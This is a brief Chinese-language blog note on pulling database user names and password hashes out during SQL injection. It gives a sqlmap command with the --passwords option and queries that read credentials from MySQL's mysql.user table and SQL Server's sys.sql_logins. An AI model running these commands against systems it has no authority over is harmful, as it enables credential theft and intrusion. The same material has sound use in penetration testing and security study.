【Tech】[SQL]SQL注入取得使用者帳號密碼的方法First Post: 2023-06-12Last Update: 2023-06-12Word Count: 50Read Time: 1 min前言記錄幾個在sql注入中可以把database user, password拿出來的方法 SQLMap1sqlmap.py -u xxx --passwords SQL Query12345//MySQLselect host,user,password from mysql.user;//SQL Server 2022SELECT name, CONVERT(varchar(max), password_hash, 1) AS hashed_password FROM sys.sql_logins∧≡